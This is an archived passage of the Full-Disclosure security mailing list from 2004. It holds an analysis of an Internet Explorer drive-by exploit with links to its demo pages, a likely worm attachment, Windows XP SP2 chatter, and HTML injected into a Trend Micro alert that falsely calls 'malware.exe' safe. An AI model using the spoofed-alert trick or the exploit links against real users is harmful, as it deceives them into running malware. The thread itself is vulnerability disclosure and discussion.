Why don't you have this patch > >> deployed yet? Why are these systems reachable from the Internet over > >> port > >> 445? > >> > > For someone who knows nothing about his network, you sure are willing > > to make a lot of assumptions. You admit you don't know how the systems > > were compromised and you don't know what compromised them, yet you > > castigate him for leaving port 445 open and not patching and you > > assume this happened *remotely*? > >> [SNIP] > You're right, I made an assumption that the systems were being > compromised remotely rather than being deliberately and maliciously > hacked by insiders. Would this somehow be less of a problem? Having > systems with routable addresses reachable through port 445 is the most > likely avenue of compromise, if this is not the case then Josh would be > well advised to determine exactly what is going on with his network. > Agreed here, anyone sitting with exposed windows specific ports on the insecure Internet is pretty much deserving of what hits them these days. Without tackling that side of the coin, it's going to be pretty hard for these folks to determine if the troubles they are facing is internal or not. Without control of the perimiter choke point, how can one even think to start to look at controls of the whole danged wire inside? Perhaps we need to adapt personal firewall day to a monthly thing for the next 5 years or more to help these clueless souls. [SNIP] Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html From jkuperus at planet.nl Mon Jun 7 04:51:13 2004 From: jkuperus at planet.nl (Jelmer) Date: Mon, 07 Jun 2004 05:51:13 +0200 Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan) In-Reply-To: <200406070243.i572hHv20372@netsys.com> Message-ID: <000001c44c42$b0da5e30$3200000a@alex> Most recent exploits are like vehicles, they are assembled piece by piece, you can make a virus scanner detect the wheels, but a car, a bus and a bike are most certainly entirely different things! Yet none of them are any good without wheels, oh and in this case painting the wheel another color would circumvent detection, it's just that trivial, virus scanners are pretty useless against these type of attacks >From the psysm description: "The vulnerability allows for the writing, and overwriting, of local files by exploiting the ADODB.Stream object" As I wrote in the analysis, this exploit uses both known and unknown vulnerabilities. What is detected as psysm (the wheels) is what I described in this post http://seclists.org/lists/fulldisclosure/2003/Aug/1703.html And is used in this exploit as well However this flaw that has gone unpatched for many many months, only works when run from a file on the local hard drive!, so essentially it's a useless find unless you can complement it with one or more other vulnerabilities Over the past couple of months it's been combined with many an exploit I used it in combination with one of liu's finds http://lists.netsys.com/pipermail/full-disclosure/2003-September/009992.html Andreas sandblad used it: http://www.forbiddenweb.org/viewtopic.php?t=5242&view=previous Mindwarper used it: http://www.securityfocus.com/archive/1/342471 Some unknown person used it in the wild and wrote a worm, http-equiv did a writeup on it http://seclists.org/lists/fulldisclosure/2004/Mar/1404.html many many more people used it But it are all separate exploits and none of the formentioned ones work anymore they have been patched and dealt with, well except on thor's pc naturally ;) but thor deserves only mockery -----Original Message----- From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Larry Seltzer Sent: maandag 7 juni 2004 4:43 To: 'Jelmer'; bugtraq at securityfocus.com Cc: full-disclosure at lists.netsys.com; peter at diplomatmail.net Subject: RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan) >>Finally I also attached the source files to this message My McAfee-based gateway scanner blocks the attachment and labels it as "VBS/Psyme", which has this description (http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100749): "This trojan exploits an unpatched (at the time of this writing) vulnerability in Internet Explorer. The vulnerability allows for the writing, and overwriting, of local files by exploiting the ADODB.Stream object. There are several variants of this trojan. Therefore this description is design to give an overview of how the trojan works. The trojan exists as VBScript. This script contains instructions to download a remote executable, save it to a specified location on the local disk, and then execute it." Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.ziffdavis.com/seltzer larryseltzer at ziffdavis.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html From chris at compucounts.com Mon Jun 7 05:11:22 2004 From: chris at compucounts.com (Chris Carlson) Date: Mon, 7 Jun 2004 00:11:22 -0400 Subject: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code) Message-ID: No complaints from me. While the new "security center" complains about how I don't have a firewall or antivirus installed (it doesn't detect either), the better security more than makes up for this minor annoyance - I no longer need to worry about where I go because the simple yet absolute 'no popups' and 'no software installations' security settings lock IE down so well. A note about the security center- I *think* it can be disabled by editing the %systemroot%\inf\sysoc.inf file to show the entry for it in add/remove windows components. I've tried to do this, but it either does not have immediate results, or does not work. I havn't done any real research on it because of a lack of time (or perhaps patience), but would like to know how to get rid of this if anyone knows. I think VirtualPC and SP2 have problems coexisting, since VirtualPC has never worked properly for me (host BSOD when starting a VM or VM BSOD while installing; comments?), but that aside I've seen no apparent problems- instability, memory management or otherwise. After attempting to uninstall SP2 (beta, not RC1 - all other comments are regarding RC1), many windows components claimed I was still running SP2, while others claimed SP1. I think this may have caused some problems when attempting to install a second (very old) video adapter (BSOD, lockups, etc), but there's no way to be sure of it. It appears to just be a quark in the installer. /c > -----Original Message----- > From: Jelmer [mailto:jkuperus at planet.nl] > Sent: Sunday, June 06, 2004 22:17 > To: Chris Carlson > Cc: full-disclosure at lists.netsys.com > Subject: RE: [Full-Disclosure] Internet explorer 6 execution > of arbitrary code (An analysis of the 180 Solutions Trojan) > > I haven't installed SP2 yet since I heard a lot of complaints > from people who claimed it caused instability, it had memory > management issues, some drivers didn't work, security > measures a bit too much in your face etc > > But I reviewed the list of changes sometime back and I > concur, it looks very promising, I think in the near future > an IE exploit will be a rare occurrence as opposed to a bi > weekly event > > -----Original Message----- > From: Chris Carlson [mailto:chris at compucounts.com] > Sent: maandag 7 juni 2004 4:06 > To: Jelmer > Cc: full-disclosure at lists.netsys.com; bugtraq at securityfocus.com > Subject: RE: [Full-Disclosure] Internet explorer 6 execution > of arbitrary code (An analysis of the 180 Solutions Trojan) > > When run remotely: > > Line: 1 > Char: 1 > Error: Access is denied. > Code: 0 > URL: http://62.131.86.111/security/idiots/repro/installer.htm > > When run locally, software installation is blocked. > > Using IE 6.0.2900.2096 SP2, WinXP SP2 > > I've gotta say that SP2 has some VERY nice protection > builtin. On the downside, I still havn't figured out how to > turn it off ;) > > > -----Original Message----- > > From: full-disclosure-admin at lists.netsys.com > > [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Jelmer > > Sent: Sunday, June 06, 2004 21:22 > > To: bugtraq at securityfocus.com > > Cc: full-disclosure at lists.netsys.com; peter at diplomatmail.net > > Subject: [Full-Disclosure] Internet explorer 6 execution of > arbitrary > > code (An analysis of the 180 Solutions Trojan) > > > > Just when I though it was save to once?more?use internet explorer I > > received an?email bringing my attention to this webpage > > http://216.130.188.219/ei2/installer.htm ? that according > to him used > > an exploit that affected fully patched internet explorer 6 > browsers. > > Being rather skeptical I carelessly clicked on the link only to > > witness how it automatically installed addware on my pc!!! > > ? > > Now there had been reports about 0day exploits making > rounds for quite > > some time like for instance this post > > ? > > > http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0 > > ? > > However I hadn't seen any evidence to support this up until > now Thor > > Larholm as usual added to the confusion by deliberately spreading > > disinformation as seen in this post > > ? > > http://seclists.org/lists/bugtraq/2004/May/0153.html > > ? > > Attributing it to and I quote "just one of the remaining IE > > vulnerabilities that are not yet patched" > > > > I've attempted to write up an analysis that will show that > there are > > at least 2 new and AFAIK unpublished vulnerabilities (feel free to > > proof me > > wrong) out there in the wild, one being fairly sophisticated > > > > You can view it at: > > > > http://62.131.86.111/analysis.htm > > > > Additionally you can view a harmless demonstration of the > > vulnerabilities at > > > > http://62.131.86.111/security/idiots/repro/installer.htm > > > > Finally I also attached the source files to this message > > > > > > > > From raju at linux-delhi.org Mon Jun 7 05:24:30 2004 From: raju at linux-delhi.org (raju at linux-delhi.org) Date: Mon, 7 Jun 2004 09:54:30 +0530 Subject: [Full-Disclosure] Re: Word file Message-ID: <200406070417.i574H1v18081@netsys.com> Here is the file. -------------- next part -------------- A non-text attachment was scrubbed... Name: document_word.pif Type: application/octet-stream Size: 17920 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040607/318b186a/attachment.obj From debian-security-announce at lists.debian.org Mon Jun 7 05:35:26 2004 From: debian-security-announce at lists.debian.org (debian-security-announce at lists.debian.org) Date: Mon, 7 Jun 2004 06:35:26 +0200 (CEST) Subject: [Full-Disclosure] [SECURITY] [DSA 516-1] New odbc-postgresql packages fix denial of service Message-ID: An embedded and charset-unspecified text was scrubbed... Name: not available Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040607/e0c028d7/attachment.ksh From poof at fansubber.com Mon Jun 7 06:11:37 2004 From: poof at fansubber.com (Poof) Date: Mon, 7 Jun 2004 01:11:37 -0400 Subject: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code) In-Reply-To: Message-ID: <200406070511.i575Blv03328@netsys.com> > While the new "security center" complains about how I don't have a > firewall or antivirus installed (it doesn't detect either), the better > security more than makes up for this minor annoyance - I no longer need to > worry about where I go because the simple yet absolute 'no popups' and 'no > software installations' security settings lock IE down so well. Well, the "Security Center" will only detect your firewall/antivirus if the program tells Windows that it's protecting your computer. (New API Microsoft did... Many companies are using it now.) > A note about the security center- I *think* it can be disabled by editing > the %systemroot%\inf\sysoc.inf file to show the entry for it in add/remove > windows components. I've tried to do this, but it either does not have > immediate results, or does not work. I havn't done any real research on > it because of a lack of time (or perhaps patience), but would like to know > how to get rid of this if anyone knows. Well, all you have to do to disable it... Is disable the "Security Center" service in the services.msc! Gasp! Easy. =) BTW. Uninstalling a service pack isn't 100% supported. It's recommended to wipe and reinstall. ~ -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 2813 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040607/e38e6692/attachment.bin From scottp at dreamwright.com Mon Jun 7 07:39:16 2004 From: scottp at dreamwright.com (Scott Phelps) Date: Mon, 7 Jun 2004 02:39:16 -0400 Subject: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code) In-Reply-To: <200406070511.i575Blv03328@netsys.com> Message-ID: <20040607063923.XSAW6802.imf19aec.mail.bellsouth.net@maudib> I would really watch out if trying an uninstall of SP2. My understanding is that the size of it (something like 270 M) is because you get a lot of recompiled binaries adding buffer overflow protection. It wouldn't surprise me if a few things are left behind after an uninstall. Scott P "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety" Benjamin Franklin, 1759 -----Original Message----- From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Poof Sent: Monday, June 07, 2004 1:12 AM To: 'Chris Carlson'; 'Jelmer' Cc: full-disclosure at lists.netsys.com Subject: RE: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code) > While the new "security center" complains about how I don't have a > firewall or antivirus installed (it doesn't detect either), the better > security more than makes up for this minor annoyance - I no longer need to > worry about where I go because the simple yet absolute 'no popups' and 'no > software installations' security settings lock IE down so well. Well, the "Security Center" will only detect your firewall/antivirus if the program tells Windows that it's protecting your computer. (New API Microsoft did... Many companies are using it now.) > A note about the security center- I *think* it can be disabled by editing > the %systemroot%\inf\sysoc.inf file to show the entry for it in add/remove > windows components. I've tried to do this, but it either does not have > immediate results, or does not work. I havn't done any real research on > it because of a lack of time (or perhaps patience), but would like to know > how to get rid of this if anyone knows. Well, all you have to do to disable it... Is disable the "Security Center" service in the services.msc! Gasp! Easy. =) BTW. Uninstalling a service pack isn't 100% supported. It's recommended to wipe and reinstall. ~ From adam at nhh.hu Mon Jun 7 07:39:34 2004 From: adam at nhh.hu (Szilveszter Adam) Date: Mon, 07 Jun 2004 08:39:34 +0200 Subject: [Full-Disclosure] weather.com contact In-Reply-To: <20040605112540.H75779@dekadens.coredump.cx> References: <000901c44a9c$f6eb8400$547abe18@proclaimed> <20040605112540.H75779@dekadens.coredump.cx> Message-ID: <04Jun7.084025cest.118585@fd.hif.hu> Michal Zalewski wrote: > On Fri, 4 Jun 2004 fd at proclaimed.net wrote: > > >>Anyone know anyone at weather.com? > > > No, but I must share that I am perhaps for the first time on this list > truly scared of what you might have discovered. > > A weather control exploit? No, I was first to discover this, but problem is I can only manage to crash the control yet, no remote code execution, and every crash causes miserable weather for 7 days in a row in the affected area so I cannot afford to experiment much, ppl are already threatening to linch me for blowing the summer :-) Regards: Sz. From yehudi at tehila.gov.il Mon Jun 7 07:56:20 2004 From: yehudi at tehila.gov.il (Yaakov Yehudi) Date: Mon, 7 Jun 2004 09:56:20 +0300 Subject: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code) In-Reply-To: <200406070511.i575Blv03328@netsys.com> Message-ID: <000b01c44c5c$8a0c4a60$dc09050a@tehila.gov.il> >BTW. Uninstalling a service pack isn't 100% supported. It's recommended to wipe and reinstall. Where does that statement come from? Microsoft? I'd be interested to see any references you might be able to provide. Thanks! From nils at druecke.strg-alt-entf.org Mon Jun 7 12:40:00 2004 From: nils at druecke.strg-alt-entf.org (Nils Ketelsen) Date: Mon, 7 Jun 2004 07:40:00 -0400 Subject: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code) In-Reply-To: <200406070511.i575Blv03328@netsys.com> References: <200406070511.i575Blv03328@netsys.com> Message-ID: <20040607114000.GA14622@bug> On Mon, Jun 07, 2004 at 01:11:37AM -0400, Poof wrote: > Well, the "Security Center" will only detect your firewall/antivirus if the > program tells Windows that it's protecting your computer. (New API Microsoft > did... Many companies are using it now.) Ohh, then I can just write a program doing nothing but telling windows it protects it to make this warning go away? Cool. There will be many of these out there when SP2 goes around. Maybe at $5 or so. Snakeoil at its best. And even proves protection by making the windows warning go away. Nils -- Well... It all started with a typo in a safe sex pamphlet. By the time I discovered I didn't really have to use a condor every time, I'd kind of gotten used to them. [bsvitavsky at mln.lib.ma.us in rec.arts.comics.dc.universe] From christoph.gruber at wave-solutions.com Mon Jun 7 13:06:21 2004 From: christoph.gruber at wave-solutions.com (Christoph Gruber) Date: Mon, 7 Jun 2004 14:06:21 +0200 Subject: [Full-Disclosure] another new worm submission In-Reply-To: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Josh wrote 04.06.2004 21:11:26: > http://www.detroit-x.com/analysis.htm > > This is something we found this morning. I have packet captures > that I will post. > I have attached the infected files found with FPORT and also > registry entries. > > We found this rebooting machines with the LSASS.exe error similar > to Sasser. As of 6/4/2004 we found no virus defs to pick it up. > > > Joshua Perrymon > Sr. Network Security Consultant Hi there! There is another Registry-entry: Cheers! - -- Christoph Gruber, Senior Security Architect WAVE Solutions Information Technology GmbH Nordbergstrasse 13, A - 1090 Wien, Austria christoph.gruber at wave-solutions.com Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1 PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3 C2DF 435A C85C 558E D42B -----BEGIN PGP SIGNATURE----- Version: PGP 8.0.3 iQA/AwUBQMRaFkNayFxVjtQrEQKmYwCg4ufJbS1o/5/C73FUSzBQ+D77OXsAoMLD 82mFBEHVI5D0bGtwTIoLQx9G =SKaL -----END PGP SIGNATURE----- -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040607/933b50d4/attachment.html From 1 at malware.com Mon Jun 7 15:31:01 2004 From: 1 at malware.com (http-equiv@excite.com) Date: Mon, 7 Jun 2004 14:31:01 -0000 Subject: [Full-Disclosure] TREND MICRO: The Protector Becomes The Vector Take II Message-ID: <200406071431.i57EV1Vb015632@web121.megawebservers.com> Monday, June 07, 2004 Further to the examination of this: [see: http://securityfocus.com/archive/1/365050/2004-05-28/2004- 06-03/0 ] It may very well be that alert file while in the temporary folder does not in fact run under the so-called "My Computer" zone. Previous testing required irritatingly precise manual construction of the .zip file with test string therein by the counting off the amount of desired html characters to test against the name of the file in the .zip and manually modifying it accordingly. While the overall html concept and problem is sound as demonstrated, we today find a much easier and default and perhaps even worse problem than before. Incoming Email: The gadget has a scanning mechanism for incoming email messages utilising the exact same alert scheme. In this instance everything is set on default and we need not enclose our "bait" in a container and fiddle for hours with its name. We have a subject and a sender field. In this case we do like so: Your Safe File

Trend Micro Internet Security confirms this file
malware.exe is safe to open. Proceed.